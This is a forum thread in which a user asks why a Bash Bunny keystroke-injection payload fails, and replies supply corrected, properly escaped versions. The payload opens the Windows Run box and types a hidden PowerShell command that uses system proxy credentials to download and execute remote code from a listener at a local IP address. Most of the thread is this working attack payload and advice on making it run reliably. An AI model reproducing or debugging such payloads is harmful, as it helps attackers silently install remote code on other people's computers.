Jump to content

Problem With Custom Powershell Script?


bufferoverflow
 Share

Recommended Posts

Hey guys, So I'm trying to run a powershell script to call back to my listener, I have tried this on my Win7 Vm, and Windows 10 and both times same error.

The error I get is bash bunny starts then on the computer it only prompts the run window, but doesn't copy the script and enter it. Whats the problem?

Here is my payload.txt

ATTACKMODE HID
LED B
Q GUI r
Q DELAY 100
Q STRING powershell.exe -nop -w hidden -c $W=new-object net.webclient;$W.proxy=[Net.WebRequest]::GetSystemWebProxy();$W.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $W.downloadstring('http://192.168.0.15:8080/Fs8jFMEC');
Q DELAY 500
Q ENTER
LED G

 

Thanks

Link to comment
Share on other sites

Try using parentheses around the string.

E.g.

Q STRING "powershell.exe -nop -w hidden -c $W=new-object net.webclient;$W.proxy=[Net.WebRequest]::GetSystemWebProxy();$W.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $W.downloadstring('http://192.168.0.15:8080/Fs8jFMEC');"

 

Link to comment
Share on other sites

Lets clean that up even better so it works and not substitute the "$"s with empty bash values.

 

Q STRING "powershell.exe -nop -w hidden -c \"\$W=new-object net.webclient;\$W.proxy=[Net.WebRequest]::GetSystemWebProxy();\$W.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX \$W.downloadstring('http://192.168.0.15:8080/Fs8jFMEC');\""

Think I mentioned this before when using BB to send the powershell command.

1) Encapsulate string parameter in quotes.

2) After doing this all quotes , "$"s and back slashes (\) you want to send have to be escaped with "\".

3) encapsulate the actual command string in escaped quotes so it is seen as 1 parameter argument in Windows.

The idea is to pass your powershell commands to powershell.exe as a string.

To really see what is coming out, have your payload launch notepad and type the executing string into it to see how it looks.

 

Also, it looks like you are trying to type this all out in the run command instead of dropping to cmd first.  The run command has a limit of characters that is much smaller than the command line before it truncates your input.  That maybe happening too.  You may have to put larger pauses/delays between your quack commands too.  I always test with big time delays and then adjust accordingly to smaller times depending on responses.

Edited by PoSHMagiC0de
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...